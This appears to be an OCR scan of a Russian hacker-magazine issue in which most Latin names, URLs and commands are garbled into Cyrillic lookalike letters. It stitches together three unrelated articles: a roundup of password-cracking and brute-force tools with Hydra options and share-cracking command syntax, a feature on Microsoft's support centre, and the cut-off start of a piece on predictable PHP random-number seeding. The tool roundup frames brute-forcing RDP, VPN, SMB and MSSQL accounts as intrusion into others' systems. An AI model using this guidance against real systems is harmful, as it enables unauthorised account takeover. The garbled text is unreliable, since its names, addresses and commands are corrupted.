разработчика. РБСгаск ѵі.0.1 ( ѵѵѵѵѵѵ.іюипбзіюпе. 
соігУиз/гезоигсез/ргоббезсЛзсгаск.Мпп ] — класс- 
но реализованный фронтенд, в котором парамет- 
ры для взлома задаются через удобное окошко, 
а он уже сам составляет команду для запуска 
Джона и выдает результат работы. 

► Для локального взлома паролей для никсов 
и винды 

ЬоРНТСРАСК 

ѵѵѵѵѵѵ.ІОрЫсгаск.сот 
Платформа: ѴѴІпсІоѵѵз 

Дата программа уже целенаправленно разрабо- 
тана для аудита паролей в ѴѴІпсІоѵѵз. ЮрЬЮгаск 
восстанавливает пароли от ѴѴІпсІоѵѵз по их хешам, 
раздобытым с локальной машины, сервера в сети, 
контроллера домена или Асііѵе Оігесіюгу. В про- 
грамме есть встроенный снифер, который может 
перехватить зашифрованные хеши по локалке. 
Впрочем, помимо виндовых хешей программа 
отлично управится и с юниксовым СЬабоѵѵ. 

Для восстановления пароля используются раз- 
личные атаки: по словарю, брутфорс, гибридный 
способ. В последнем случае можно задать 
настройки для мутации пароля: например, бапа в 
Оапа99. Разработчики не поленились упростить 
процедуру по подбору пароля: теперь прямо на 
запуске программы появляется специальный 
мастер, который последовательно выясняет, что 
именно ты хочешь сделать. 

Интересный факт. После приобретения в 
2006 компанией 5утап1:ес поддержка и раз- 
витие программы заглохли, однако ребята- 
разработчики выкупили свою разработку 
обратно в мае этого года и выпустили на свет 
І_С6. Последняя версия отлично работает под 
64-битными системами, использует преиму- 
щество многопроцессорных и многоядерных 
систем. К сожалению, за использование 
ЮрЬЮгаск разработчики просят почти триста 
баксов, хотя и предоставляют триальный срок 
без ограничений. Но у тулзы есть бесплатные 
аналоги, например, консольная Рѵѵбитр [ ѵѵѵѵѵѵ. 
ІюоІюз.пеДЮгдід/рѵѵбиппр ]. а также орЬсгаск 



МНОГОЧИСЛЕННЫЕ КЛЮЧИ ДЛЯ 
ЗАПУСКАТНС НУйРА 
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[ орЬсгаск.зоигсеЬгде.пеЬ . использующий для 
взлома Ра іпбоѵѵ-та блицы. 

► Восстановление пароля ѴѴІпсІоѵѵз и ІІпіх по 
его хешу 

Саіп апсі АЬеІ ◄ — 

ѵѵ ѵѵѵѵ. ох і сі . к/с а і п . Ы: т I 
Платформа: ѴѴІпсІоѵѵз 

Об этой утилите мы уже рассказывали, 
когда составляли нашу подборку сниферов. 
Но вместе с тем это еще и сногсшиба- 
тельный инструмент для восстановления 
паролей. Если не брать в расчет вос- 
становление слабо защищенных паролей 
(например, сохраненных в браузере] и про- 
смотр пасса под звездочками, то основная 
часть программы заключается во встро- 
енной утилите для взлома 25 различных 
видов хешей: начиная от пресловутого МБ5 
и заканчивая І\ІТІ_Мѵ2 для восстановления 
паролей в винде. Для подбора применя- 
ется как атака по словарю, так и тупой 
брутфорс. 

► Взлом 25 различных хешей (пароли 
ѴѴІпсІоѵѵз, МуБОЦ М550Ц Огасіе, 5ІР, ѴІЧС, 
СІ5С0, ключи ѴѴРА-Р5К и т.д.) 



фТНС-НусІга 

^гееѵѵогШ.Щс.огд/Щс-Нусіга 
Значок: ѴѴІпсІоѵѵз, ІІпіх 

Аббревиатура ТНС в названии программы 
— уже гарант качества. Но этот проект ТНС- 
Нубга надолго войдет в истории хакерского 
движения, как один из лучших универсаль- 
ных брутфорсеров. В основе программы 
лежит модульная структура, поэтому проект 
с самого начала быстро развивался: коли- 
чество поддерживаемых протоколов росло, 
как на дрожжах. Сейчас с помощью гидры 
пароль можно подобрать к более чем 30 
протоколам, включая Іеіпеі:, Юр , ЫТр, ЫТрз, 
зппЬ, несколькими СУБД, и т.д. Кстати, ТНС- 
Нубга 

САШ АЫйАВЕЬ В ДЕЙСТВИИ 



ЮРНТСРАСК ВОССТАНОВИЛ ПА- 
РОЛЬ ДЛЯ УЧЕТКИ САДМИНСКИ- 
МИ ПРАВАМИ 

брутит и 55Н, но для этого требуется наличие 
библиотеки ШэззЬ. 

Мощнейший брутер, однако в виду огромного 
количества настроек и опций далеко не всем 
покоряется с первого раза :). 

Если со стандартной установкой «./ 
сопЬдиге&таке&таке іпзЕаІІ» справляются 
все, то совладать с многочисленными клю- 
чами для запуска не так просто. В качестве 
примера приведу несколько основных функ- 
ций: 

• В — восстановление сессии после сбоя; 

• е П5 — проверка наличия пустого пасса и 
пасса, равного логину; 

•С РНЕ- брут из файла с записями вида 

ЛОГИН:ПЭрОЛЬ; 

• о РНЕ — вывод результатов работы в 
файл; 

• і — завершение брута после первой най- 
денной пары логин:пасс; 

• I ТА5К5 — количество ПОТОКОВ; 

• ѵі ТІМЕ — тайм-аут (30 секунд по дефолту]. 
Подробнее об использовании Нубга ты 
можешь прочитать в нашей старой статье 
«Брутфорс по-нашему!» (73 номер ц-Е, рбЮ 
версию статьи ты найдешь на диске]. К 
счастью, сами разработчики позаботились о 
графической части утилиты, но она запустит- 
ся только под никсами. 

► Многопоточный брутфорсер для следую- 
щих протоколов: БатЬа, РТР, РОРз, ІМАР, 
Теіпеі, НТТР Аи* *Ь, ЮАР, ІЧІЧТР, Му5СІІ_, ѴІЧС, 
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Чтобы всегда иметь 
при себе подборку 
брутфорсеров, мы все 
скачали за тебя и по- 
ложили на наш диск. 
А в качестве бонуса 
подготовили для тебя 
солидную подборку 
словарей! 



гФЬіі 



НТТР://ѴѴѴШ 



1 

> Цпкб 

• Узкоспециализиро- 
ванные брутфорсеры 
на Руібоп и Регі: 
Шр://ѵѵѵѵѵѵ.сІагксОсІе. 
сот/Ьгиіеіогсе . 

• Словари для пере- 
бор а : МірУ/уууууѵ^ 
раззѵуогбз.гц/біс.Ыт 

• Онлайн-сервисы 
для взлома хешей: 
раззсгаскіпд.ги: 
тіІУѵОгт.сот : 
дбаіаопііпе.сот ; 
ѵѵѵѵѵѵ.тсібііоогі.сот: 
ѵѵѵѵѵѵ.ІіазЬсЬескег. 
сот. 



ѵѵѵѵѵѵ.сіагкпеі.огд. и к/2008/07/ 

ІздгіпсІег-ЬгиІе-гогсе-'ІегтіпаІ- 

зегѵісез-зегѵег 

Одна из немногих утилит для подбора пароля для подключения 
к удаленному рабочему столу винды по протоколу ПРО. Задачу 
такого перебора сильно осложняет шифрованное соединение и 
ключами: сымитировать подобный криптообмен данными доста- 
точно трудно. Вторая загвоздка заключается в отсутствии к РРО 
консольного режима. Но умельцы, однако, нашли способ обойти 
оба ограничения — использовать стандартные средства для 
работы по ВОР и эмулировать ввод логина/пароля, как будто это 
делает сам пользователь. 

За одно такое подключение тулза проверяет несколько 
паролей. ТЗОгіпбег может проверить 5 паролей за одно 
подключение, переконнетиться и проверить пять следую- 
щих. Одновременно с этим тулза поддерживает несколько 
потоков. Основной способ атаки заключается в переборе 
паролей по словарю, однако также поддерживаются неко- 
торые интересные фичи, например, так называемые 1337- 
преобразования, когда буквы латинского алфавита заменя- 
ются на цифры. Забавно, что после запуска тулзы с нужны- 
ми параметрами на экране появляется окно ВРО-клиента, 
и ты видишь, как программа перебирает разные варианты, 
сообщая о результате в консоли. Для работы ^илиты необ- 
ходимо установить МісгозоЙ Зітиіаіесі Тегтіпаі Зегѵег Сііепі: 
ІооІ, которую также называют гоЬосІіепТ Ее можно закачать с 
сайта ^рУЛір.тісгозо^.сот/ВезКк/ѵѵіпЗООО/гоЬосІіепЕгір или 
же взять с нашего диска. 

► Для брутфорса РРй-акков 



[►РаіпЬоѵѵСгаск 

ргоіесЦгаіпЬоѵѵсгаск.сот 
Платформа: ІІпіх, ѴѴІпсіоѵѵз 

Обычно, хешированный вариант пароля хранится в открытом 
доступе и известно, по какому алгоритму получен этот хэш 
(например, ІѴЮ5], но обратное преобразование считается 
слишком сложной операцией, требующей в общем случае 
перебора всех возможных комбинаций — это ставится в осно- 
ву безопасности многих современных систем. Если же иметь 
сортированные таблицы хешей и соответствующие им пароли 
— получим систему, которая с помощью быстрого бинарного 
поиска по таблице может получать обратное преобразование 
хеша в пароль для любого существующего алгоритма хеши- 



рования. Основная проблема: таблицы всех возможных 
паролей занимают слишком большой объем на дисках. 
Поэтому используется оригинальный формат таблиц: 
хеши собираются в цепочки по несколько тысяч комби- 
наций — каждая следующая комбинация получается из 
предыдущей очередным применением той же функции 
хеширования. В таблицы записывается только начало 
и конец каждой такой цепочки. Чтобы найти пароль 
по такой таблице, нужно применить к заданному хешу 
функцию хеширования точно также несколько тысяч раз 
(в зависимости от используемой длины цепочек] — и 
на очередной итерации получим хеш, который является 
концом одной из цепочек в наших таблицах. После чего 
прогоняем эту цепочку заново от начального хеша до 
нужного и находим комбинацию, предшествующую наше- 
му хешу — это и есть искомый пароль. 

РаіпЬоѵѵСгаск позволяет использовать такой подход. 
Смысл заключается в том, что много времени занимает 
составление таблиц, зато взлом паролей осуществляется 
в сотни раз быстрее, чем брутфорс. РаіпЬоѵѵСгаск помо- 
жет как составить таблицы, так и использовать их для 
взлома хеша. Кстати, тратить уйму времени на составле- 
ния таблиц совсем необязательно — их можно купить и 
частично скачать из торрентов. 

► Чрезвычайно быстрое восстановление пароля 
по хешу с использованием РаіпЬоѵѵ-таблиц 



МсІ5 Сгаск Мопзіег ѵі.і 

ѵѵѵѵѵѵ.сІагксОсІе.сот/сОсІе/регІ/ 

тст.М 

Платформа: ІІпіх, ѴѴІпсІоѵѵз 

Перед тем, как лезть на рожон, запуская брутфорс хеша, 
не поленись пробить его по онлайн-базам. Например, в 
дбаіаопііпе.сот содержится более миллиарда уникаль- 
ных записей, а это лишь один из многочисленных про- 
ектов (некоторые из них ищи в боковом выносе]. Чтобы 
упростить муторное занятие по проверке хеша на раз- 
личных сервисах, рекомендую тебе классный скрипт М65 
Сгаск Мопзіег, написанный на Регі. Он прочекаетхеш по 
солидному списку сервисов и выдаст результат. 

► Поиск значения хеша в онлайн-базах 

ТНС РРТР Ьгиіег 

ѵѵѵѵѵѵ.Щс.огд 
Платформа: ІІпіх 

Кто сказал, что подобрать пароль к ѴРІ\І -аккаунту невоз- 
можно из-за особенностей авторизации? Чушь! Парни 
из всемирно-известной хакерской группы ТНС уже 
давно доказали обратное, выпустив риЫіс-релиз тулзы 
ТНС-ррІр-ЬгиІег. Данная прога представляет собой узко- 
специализированный брутфорсер для РРТР-протокола 
(1723/ТСР), который действительно работает! :] Правда, 
только в том случае, когда сервер использует авториза- 



ПРОБИВАЕМХЕШ ПРОСТОГО ПАРОЛЯ 
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удачный взлом с использованием радужныхтаблиц 



61107968 ЪуЬез і-еагі, гіізк ассезз Ііпе: 13-72 



еагсЬіпд Рог 1 ЬазЬ. . . 
ІаіпЬехІ: оР 624аас413795осІс1 
гурЪапаІуе із Ъіте: 0.02 з 



ІЬкЗЫзМб Ііех : 6с4с6Ь334е734Д36 
Сез^123 кех: 74657374313233 
КБкоЗпбоЗ Ьех:4Ь536Ь6а336е536РЗЗ 
БКп38к9Р кех : 444Ь6е33536Ь3966 
КзНп3219аРз Ьех:4Ь734е6й33326с39614673 
отдЬ4х0г136 Ьех:6Р6й676834783072313336 




цию МісгозоіЧ ѴѴіпсІоѵѵ СЬар Ѵ2. Спешу обрадовать: чаще 
всего используется именно она, причем как на ѴѴіпсІоѵѵз- 
серверах, так и серьезных СІЭСО-системах. Что касается 
старой ѴѴіпсІоѵѵ СЬар VI , то ее поддержку тебе, вероятно, 
придется реализовать самостоятельно :). Проблема реа- 
лизации в том, что М ісгозобі; намеренно реализовала в 
Р РТР- прото коле систему защиты против брутфорса. Если 
не вдаваться в подробности, то ее смысл заключался в 
установке ограничения: «за одну секунду можно ввести 
только один пароль». Естественно, что с такой скоро- 
стью перебора хакер далеко не уедет и шансы подобрать 
пароль будут сведены к нулю. Однако в реализации, по 
традиции, не обошлось без изъянов, которые были опу- 
бликованы на багтраках, а группа ТНС успешно заюзала 
их в конкретной программе. С помощью ТНС-ррІр-ЬшІег 
можно обойти ограничения, установленные Місгозоіф и 
добиться скорости более чем 300-400 паролей в секунду. 
Эта цифра, естественно, сильно варьируется в зависимо- 
сти от задержки в доставке пакетов до сервера, так что 
наибольшей скорости можно добиться в локальной сети. 
Огорчает лишь то, что для работы ррІр-ЬгиІег необходима 
пара сторонних библиотек. Без них программа попросту не 
скомпилируется. 

► Для брута ѴРІЧ-соединения 

+ СІРБРѵѵБсаппег 

ѵѵѵѵѵѵ.сдиге.пеіДооІз 
Платформа: ѴѴІпсІоѵѵз, Чпіх 

Сканер для аудита паролей у СІЕ5/5МВ-ресурсов или, 
проще говоря, шар, по которым ты наверняка любишь 
пройтись в своей локалке. С его помощью ты ловко смо- 
жешь подобрать необходимые данные для подключения 
к вражеской шаре в локалке. Главное — правильно вбить 
необходимую команду и подготовить словарик для брута, 
наполненный самыми разными человеческими мыслями и 
любовью. В общем виде она выглядит так: САзРѵѵЭсаппег 



-1: зегѵег -и изегз [орбопз]. Остальные опции ты можешь 
посмотреть в мане к программе или в интерактивном 
хелпе. СІЕЭРѵѵЭсаппег написан на Заѵа, а поэтому может 
быть запущен под любой платформой. 

► Подбор пароля к шарам 

рідду і.о.і 

ѵѵѵѵѵѵ^иге.пеіДооІз 
Платформа: ѴѴІпсІоѵѵЗ, ЕІПІХ 

Многопоточный брутфорс аккаунтов МісгозоД ЗОБ сер- 
вера, реализованный в виде консольного приложения. 
Рідду поддерживает диапазонный режим сканирования, 
когда на заданный пароль проверяются сразу несколько 
серверов, хранящих базы. Это особенно актуально, когда 
ты произвел сервисный скан подсети на открытый порт 
1433 (ТОР), традиционный для этого сервиса, получил 
необходимый баннер базы, после чего скормил получен- 
ные адреса рідду. Поскольку халатность администраторов 
зачастую поистине безмерна, вероятность улова весьма 
и весьма велика. 

► Аудит паролей М55СІІ_-сервера ц-ц 




> ІПІО 

Все программы 
представлены ис- 
ключительно в целях 
ознакомления. В слу- 
чае применения их 
в незаконных целях 
редакция ответствен- 
ности не несет. Более 
того, это напрямую 
запрещается лицен- 
зиями большинства 
программ. Нетеряй 
голову! 



АТАКА НА 5МВ 
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МІСГОЗОП 



Команда из 60 человек. Более 12 000 звонков в месяц. Самые прогрес- 
сивные технологии взаимодействия с пользователями и управле- 
ния знаниями. Служба поддержки МісгозоЛ — это, конечно, не центр 
управления полетами, но все равно выглядит крайне впечатляюще. 



Посмотреть на то, как устроены изнутри 
службы поддержки больших софтверных 
компаний, нам было интересно очень и 
очень давно. 

Чтобы попасть в цель наверняка, мы 
решили сразу отправиться к тому, у кого 
обращений — максимально много, а реша- 
емые задачи отличаются небывалым раз- 
нообразием. Да, мы пошли в гости 
к МісгозоЛ :). 

СЛУЖБА ПОДДЕРЖКИ 

Любой пользователь, приобретающий 
легальное программное обеспечение, 
может рассчитывать на поддержку. У одних 
компаний — это исключительно суппорт 
по телефону, другие могут помочь через 
интерактивный чат и е-таіі, третьи вооб- 
ще полагаются на самих пользователей, 
предлагая им обширную документацию и 
площадку для общения с другими пред- 
ставителями компьюнити. А МісгозоЛ? У 
МісгозоЛ’а есть все сразу! 

УСТРОЙСТВО САУ.-ЦЕНТРА 

Традиционными обращениями по теле- 
фону и етаіі, которые постепенно отходят 
на второй план, занимается саЛ-центр 
Службы поддержки. В случае с МісгозоЛ 
это не просто отлаженный механизм, но 
еще и самые прогрессивные технологии 



управления знаниями. Оно и понятно, 
когда в день поступают сотни разнооб- 
разных заявок и на любой вопрос надо 
найти ответ, быть по-другому не может. 
Никто другой на рынке ІТ-решений не 
обладает такой клиентской базой и соот- 
ветствующим количеством заявок в Службу 
поддержки. Только вдумайся в эти цифры: 
более 30 миллионов обработанных заявок 
в год на 29 разных языках по всему миру. 

В российском отделении МісгозоЛ исполь- 
зуется мировой опыт построения пользо- 
вательской службы. Для того чтобы меха- 
низмы системы работали максимально 
четко и быстро, в саЛ-центре используется 
двухуровневая система обработки заявок. 
Основной удар берут на себя операторы, 
которые отвечают на звонки и формали- 
зуют проблему. Это первый этап обработ- 
ки заявки. Оператор принимает звонок, 
проверяет ключ пользователя и создает 
заявку в системе с четким описанием 
проблемы. Тут надо сказать, что большая 
часть вопросов или достаточно проста, 
так что на них отвечают эти же операторы, 
или носит гуманитарный характер, и тогда 
вопросы передаются в группу информаци- 
онного сопровождения. Звонки же с тех- 
нической проблемой переадресуются на 
следующий уровень, где за клиента берет- 
ся группа инженеров, сертифицированных 



как МісгозоЛ СегЛЛесі БезІЛор ТесЬпісіап 
и/или МісгозоЛ СегЛЛесі Эузіетз Епдіпеег 
Используя базу знаний компании, опе- 
ратор подсказывает пользователю пути 
решения проблемы, фиксируя все дей- 
ствия в журнале. В базе знаний аккумули- 
рован такой огромный опыт и информация 
о проблемах с вариантами их решения, что 
при грамотном ее использовании можно 
найти ответ практически на любой вопрос. 
Для большей конкретики: из 12000 тысяч 
звонков, ежемесячно поступающих в 
суппорт российского представительства 
МісгозоЛ, технические проблемы состав- 
ляют 1400. Таким образом, практически 
90% обращений удается решить силами 
одних лишь операторов. 

ИНСТРУМЕНТЫ СЛУЖБЫ 
ПОДДЕРЖКИ 

Главный инструмент оператора — это 
база знаний компании (Кпоѵѵіесіде Вазе] с 
описанием проблем и вариантов их реше- 
ния. Основная задача для такой системы 
— грамотно формализовать проблему, 
чтобы максимально упростить дальнейший 
поиск. Для этого каждая заметка обладает 
некоторым набором обязательных полей и 
тематических тегов, указывающих на суть 
проблемы и подверженной ей программных 
продуктов. Понятно, что доступ к большей 
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части этой информации имеют не только 
сотрудники Саіі-центра, но и вообще все 
желающие абсолютно бесплатно на сайте 
зиррог^т іеговой, со т/5еагсб/?асІѵ=1 . 
Каждый из нас, наверняка, сталкивался с 
ситуацией, когда самую, казалось бы, про- 
стую вещь нужно было объяснить человеку, 
который совершенно «не в теме». В ход тут 
идет все богатство русского языка, чтобы 
доступно объяснить, что такое «вкладка», 
«опция», «кнопка» и просто слово «клик- 
нуть». Через минут десять-пятнадцать 
таких объяснений начинаешь задумывать- 
ся о том, что быстрее съездить к бедняге 
и все сделать самому. К счастью, теперь, 
когда практически у всех есть интернет, 



можно воспользоваться удаленным рабо- 
чим столом, к чему нередко прибегают и 
сотрудники Службы поддержки МісгозоЙ. 
Если оператор или инженер понимает, 
что без непосредственного контакта с 
системой клиенту не помочь, он может 
сгенерировать для него специальный линк 
и отправить его клиенту. Пользователь 
просто переходит по полученной ссылке 
и открывает для сотрудника Саіі-центра 
ПИР-сессию. Получается полноценный 
Ьасксоппесі: гетоіе сіезкіор, причем 
построен он на технологии МісгозоЙ Базу 
Аззізі. Мы лично видели, как лихо инже- 
нер управлялся с последствиями вируса на 
удаленной системе, с которыми пользова- 



тель, даже при самых подробных инструк- 
циях, едва ли мог совладать. 

ПРИЕМЫ АВТОМАТИЗАЦИИ 

Решение части проблем совершенно точно 
можно автоматизировать. Посуди сам: рас- 
сказав десяток раз одинаковое решение 
одной и той же проблемы, хочется создать 
скриптик, который все будет делать сам. 
Что пользователю, что службе поддержки 
от этого только легче. 

На этот случай в компании разработана 
специальная система Ріх Й, позволяющая 
диагностировать и устранить неполадку 
одним кликом мыши. По сути, это неболь- 
шая узкоспециализированная программка, 
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С ЭТОГО САЙТА НАЧИНАЕТСЯ СУППОРТ МІСР050РТ РІХ ІТ В ДЕЙСТВИИ И НА РУССКОМ ЯЗЫКЕ 



которая выполняет ряд заданных действий в системе и внешне 
выглядит как обычный установщик. Ссылка на закачку такого 
автоматизированного решения, как правило, дается вместе с 
инструкцией по устранению конкретной проблемы. Таким образом, 
пользователь сам решает, как устранить неполадку: выполнить 
описанные в рекомендациях действия вручную либо же скачать 
небольшую утилитку и просто запустить ее. Другими словами, 
скрипты Ріх И: автоматически применяют исправления, изменяют 
конфигурации, вносят правки в реестр, чтобы пользователю не 
приходилось выполнять длинный список действий вручную. Под- 
борку сценариев Ріх II можно найти на сайте зиррогі.тісгозоіі.сот/ 
др/ср ііхіі тазіег/ги . С момента ввода системы в декабре прошло- 
го года их скачали более миллиона пользователей и в 95% случаев 
смогли решить свою проблему. Приятно, что всебольшеибольше 
статей из базы знаний комплектуются с готовым Ріх Іі’ом. 

Другой прогрессивный путь автоматизации — встроить инстру- 
менты для выявления и решения проблем прямо в сами про- 
граммные продукты. За примером далеко ходить не надо. Для 
той же Висты разработан Місгозоіі Биррогі Оіадпозіісз Тоо I, 
который серьезно проапгрейдился в ѴѴіпсІоѵѵз 7, превратившись 
в Асііоп Сепіег. Вот тебе простой пример — отсутствие звука в 
винде может быть связано с некорректной работой драйвера, 
неисправностью звуковухи, проблемой в софте или банально 
отключенным звуком в настройках. Теперь система сама может 
диагностировать себя, попробовать выявить, в чем причина, и 
автоматически решить проблему. А если даже и не получится, 
то продвинутая справка подскажет, какие ресурсы лучше всего 
посмотреть в инете. 

51ІРР0ВТ 2.0 

Со временем служба поддержки становится намного шире, чем 
консультации потелефону. Скажу больше — люди вообще не очень-то 
любятобращаться кспециалистам и зачастую предпочитают решить 
п робл ему своими с илами. Об ращения по е-таіі, телефону и чату все 
чаще отходят на второй план, уступая место специальным онлайн- 
ресурсам, с помощью которых пользователи самостоятельно могут 
найти вариант решения проблемы. У Місгозоіі: подобных ресурсов не- 
сколько. Это в первую очередь — сайт справки и поддержки зиррогі. 
тісгозоіі.сот . 

Центры решений по продуктам позволяют просмотреть сведения о 
поддержке, включая распространенные проблемы, часто задаваемые 
вопросы, полезные ссылки, советы и инструкции, а также последние 
версии файлов для загрузки. Причем компания особый упор делает 
на локализацию: большинство востребованных статей уже давно 
переведены на русский язык (да чего стоит переведенная М50ІЧ!). 



Как пользоваться поддержкой ^ 



Самый верный способ получить ответ по продукту Місгозоіі 

— сходить на сайт зиррогі.тісгозоіі.сот . Большинство возни- 
кающих проблем давно решены, и поэтому, выбрав в верхней 
панельке нужный продукт, ты легко сможешь найти решение 
для возникшей проблемы, скачать обновления, которые навер- 
няка забыл установить, и найти еще массу полезной инфы. 
Более того, с использованием Ріх Іі сценариев устранение 
большинства проблем вообще свелось к одному клику мыши. 
І\Іо тоге іеагз, как сказал поэт-песенник, ну а если и есть — то 
совсем немного. Если же ты все-таки жаждешь интерактива 

— тебе в правый верхний уголок страницы суппорта. Ссылка 
ведет на выбор способа контакта: телефон, е-таіі, чат. 



Более опытные товарищи сталкиваются с совершенно другими, бо- 
лее сложными задачами. Но и они могут найти ответ на свой вопрос 
благодаря порталу для ИТ-специалистов ЬіірѴ/іесбпеі.тісгозоіі. 
сот . Ресурс представляет собой большую библиотеку с докумен- 
тацией и статьями, ссылками на различные ресурсы по отдельным 
продуктам и технологиям. Тут же доступны и форумы для обсужде- 
ния технических вопросов, причем помимо обычных пользовате- 
лей в дискуссиях принимают сотрудники Місгозоіі и авторитетные 
гуру со статусами МѴР, МСТ, МС5Е. Более того, блоги и форумы 
технических сообществ ты можешь найти на зиррогі.тісгозоіі.сот/ 
др/соттпеѵѵз . 

Активно развиваются и утилиты для диагностики и лечения систе- 
мы. Если опытные товарищи могут виртуозно воспользоваться ути- 
литами от Марка Руссиновича, то самым обычным пользователям 
придутся по душе бесплатные средства для поиска заразы: утилита 
Маіісіоиз Эоііѵѵаге Ретоѵаі Тооі и онлайн сканер Опе Саге Баіеіу 
[ опесаге.ііѵе.сот/зііе/еп-из/сІеіаиіі.Ьіт ]. 

В Саіі-центр Службы технической поддержки российского пред- 
ставительства Місгозоіі поступает 12000 звонков в месяц. На 
каждый запрос нужно найти ответ. Нормальный показатель 
работы Службы поддержки — не более 10% неудовлетворенных 
клиентов, однако у нашего представительства это цифра лучше. 
Главное требование: не менее 98% проблем должны быть реше- 
ны, и с этой задачей суппорт Місгозоіі вполне справляется. 
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ИНТЕРВЬЮ С ИНЖЕНЕРАМИ 



Чтобы узнать больше о работе инже- 
неров — самых главных специали- 
стов по поддержке — мы решили 
задать им несколько вопросов напря- 
мую. Ребята оказались очень веселы- 
ми и с радостью прокомментировали 
интересующие нас моменты. 

О Часто ли случается, что проблема пользователя связана с 
неизвестными ранее ошибками в продуктах компании? Можете 
вспомнить конкретный случай и дать его описание? 

А; Бывает. Как сказано в тексте лицензии М5, «никакой продукт 
не свободен от ошибок». Бета-тестирование и предпродажное 
распространение, конечно, убирают основную шероховатость, но 
не было бы аббревиатуры 5Р (1,2. ..6], не находи пользователи 
ошибки в процессе эксплуатации. 

Обращения, связанные с ошибками, единичны и составляют счи- 
танные промилле (в них еще измеряют алкоголь в крови води- 
теля:]]. Пользователю, обратившемуся с проблемой, признанной 
впоследствии ошибкой, обычно рекомендуют ѵѵогкагоипсі (обход- 
ное решение] или предлагают ждать выхода отдельного исправ- 
ления или пакета исправлений (5Р). 

Например, в русской версии Ѵізіо 2007 клавиши навигации 
(«стрелки»] были перепутаны местами. Т.е. курсор «ехал» не 
туда. Баг пофиксили только в Місгозоіі Оііісе Ѵізіо 5Р2. Іпіегпеі 
Ехріогег 8.0 не сохраняет соокіез для двухбуквенных доме- 
нов. Ранее, для I Е6.0/7.0 требуемый домен мог быть добавлен 
в реестр вручную. На данный момент двухбуквенные домены 
жестко вшиты в библиотеку 611, которая будет обновляться через 
ѴѴіпсІоѵѵз ІЭрсІаіе. 

О Каким образом удается смоделировать проблему пользо- 
вателя на машине инженера службы поддержки? Какой софт 
используется, что лежит в его основе? 

А Моделирование проблем пользователей происходит в вирту- 
альной среде. Используются Місгозоіі Ѵігіиаі РС или встроенный 
в 2008-й сервер функционал Нурег-Ѵ — для эмуляции систем с 
различной разрядностью. Инженер проходит по шагам, которые 
привели пользователя к проблеме. Если проблема воспроизво- 
дится — ищем готовое решение, изобретаем новое или передаем 
проблему узким специалистам. Если и они не находят решения 
— признаем ошибку в продукте. Если повторить ошибку не удает- 



ся — уточняем детали и пробуем снова. Можем, конечно, и под- 
ключиться к пользователю удаленно, чтобы самим посмотреть на 
последовательность его действий. 

О: Интересно услышать про механизм удаленного подключения 
к рабочему столу пользователя. Как реализована эта возмож- 
ность? Насколько часто приходится к ней прибегать и всегда 
ли на такое подключение соглашается пользователь? 

А; Для удаленного подключения к рабочему столу использу- 
ется инструмент Місгозоіі Еазу Аззізі. Инженер дает пользо- 
вателю ссылку на веб-страницу Еазу Аззізі. На этой странице 
пользователь загружает и устанавливает клиентскую часть 
программы — АсііѵеХ компонент. После этого инженер имеет 
возможность наблюдать за действиями пользователя, а с 
дополнительного разрешения пользователя может взять в 
свои руки управление компьютером. Для предупреждения 
паранойи инженер постоянно комментирует свои действия: 
«іогтаі с:, ок»? 

После окончания сессии юзер может оставить АсііѵеХ-компонент 
впрок или удалить с машины. 

Используется Еазу Аззізі далеко не всегда. Эффективнее всего 
задействовать его, когда известно точное решение проблемы, а 
просить пользователя выполнять эти действия пошагово будет 
дольше, чем выполнить самому. Или, как говорили выше, когда 
инженеру надо лично посмотреть на шаги пользователя, веду- 
щие к ошибке. Как правило, пользователи соглашаются на такое 
взаимодействие. 

0: Создаются ли какие-нибудь «точки возврата» на случай, 
если во время решения проблемы пользователь напортачит 
еще сильнее? 

А: Пользователь сам отвечает за сохранность данных. Вместе 
с тем, перед радикальными изменениями в системе инженеры 
рекомендуют создать точку восстановления системы для после- 
дующего отката или советуют сохранить личную информацию. 

О: Что делает инженер, если проблему пользователя решить не 
удается? 

А: Если инженер уперся в пределы своей компетентности, он 
всегда может проконсультироваться с более узкими специалиста- 
ми внутри компании. Вместе с тем, такая консультация (да если 
в нее еще и вовлечены иностранные коллеги] может растянуться 
на дни и недели. Хотя это и приведет к нахождению решения, 
тут уже пользователю приходится решать — продолжать научно- 
исследовательскую работу или, скажем, откатить систему на 
момент до возникновения ошибки или переустановить продукт. 
Ведь для данного конкретного юзера решение проблемы — это 
не обязательно фиксация бага в продукте, а просто «нет пробле- 
мы — нет проблемы». 
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ФАТАЛЬНАЯ ОШИБКА РАНДОМИЗАЦИИ В РНР 



Еще год назад Стефан Эссер поведал миру о предсказуемости гене- 
рации случайных чисел в РНР. Но, как это часто бывает, разработчи- 
ки, да и программисты, не всегда адекватно реагируют на бюллетени 
безопасности (кто бы их, вообще, читал, а если и читал, то читал вни- 
мательно...). Что это? Лень? Человеческий фактор? Нежелание при- 
знавать и исправлять свои ошибки? Как бы то ни было, генератор слу- 
чайных чисел РНР по-прежнему остается предсказуем. 



Для правильного понимания сути уязвимости 
вспомним, что нам уже должно быть известно из 
статей Стефана Эссера, М40'а и НагОг'а. Мате- 
риал в статьях, на мой взгляд, представлен под- 
робно, но несколько разбросанно. Ставя один за 
другим эксперименты и разобравшись в деталях 
уязвимости, я набросал краткий курс по изучению. 
Полагаю, это поможеттебе более четко предста- 
вить суть баги и вникнуть в тон кости процесса. 

НЕМНОГО ТЕОРИИ 

В РНР для генерации случайных чисел исполь- 
зуется не сосед-программист, как в бородатом 
анекдоте, а две базовых функции на выбор: 
гапсіО и тІ_гапсІ(]. Вторая предпочтительнее к 
использованию ввиду большей псевдослучай- 
ности генератора. Благодаря закономерностям 
в генерации значений возможны атаки на код, 



использующий эти функции, например, при 
генерации или сбросе паролей. Поясним, как 
это можно использовать, вызвав уязвимость. 
Во-первых, энтропия последующего вызова 
гапсі (тІ_гапсІ) зависит от результата предыду- 
щего вызова функции, именно поэтому алго- 
ритм псевдослучаен. Однако начальный 5ЕЕ0 
можно задать через функцию с приставкой 
' 5 ' : згапсі (тІ_5гапсІ]. То есть, зная начальный 
ВЕЕР, мы можем повторить генерацию на 
любом компьютере, сгенерировав всю цепочку 
якобы случайных вызовов гапсі (т1:_гапсІ), и 
получить при этом абсолютно те же числа, что 
и в оригинальном приложении на удаленном 
сервере. Во-вторых, начальный ВЕЕР зачастую 
через згапсі (тІ_5гапсІ) вообще незадают(по 
забывчивости или человеческой глупости). 

А если функция згапсі (т1:_5гапсІ) не была 



вызвана (либо вызвана без параметров), то 
РНРзадаетначальный ВЕЕР самостоятельно. 
Проблема в том, что такой ВЕЕР не превышает 
числа 2 Л 32, а это число можно банально пере- 
брать. Разберемся в особенностях генерации, 
